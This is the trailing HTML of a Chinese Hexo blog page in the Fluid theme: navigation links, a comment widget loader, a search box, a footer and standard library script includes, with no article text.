                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/09/30289.html" title="关于栈溢出的研究">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">关于栈溢出的研究</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/09/46066.html" title="论文总结-语义分割经典模型">
                        <span class="hidden-mobile">论文总结-语义分割经典模型</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'cjjcn/cjjcn.github.io');
      s.setAttribute('issue-term', 'pathname');
      
      s.setAttribute('label', 'Comment');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  





  <script>
  Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/mermaid@8.8.3/dist/mermaid.min.js', function() {
    mermaid.initialize({"theme":"default"});

    Fluid.events.registerRefreshCallback(function() {
      if ('mermaid' in window) {
        mermaid.init();
      }
    });
  });
</script>






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-copyright"></i> <a href="https://www.0error.net" target="_blank" rel="nofollow noopener"><span>2017 - 2025</span></a><br> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量: 
        <span id="busuanzi_value_site_pv"></span>
         
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数: 
        <span id="busuanzi_value_site_uv"></span>
         
      </span>
    
    
  
</div>

  
  
    <!-- 备案信息 ICP for China -->
    <div class="beian">
  <span>
    <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
      陇ICP备2021000723号-1
    </a>
  </span>
  
</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://cdn.jsdelivr.net/npm/mathjax@3.1.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
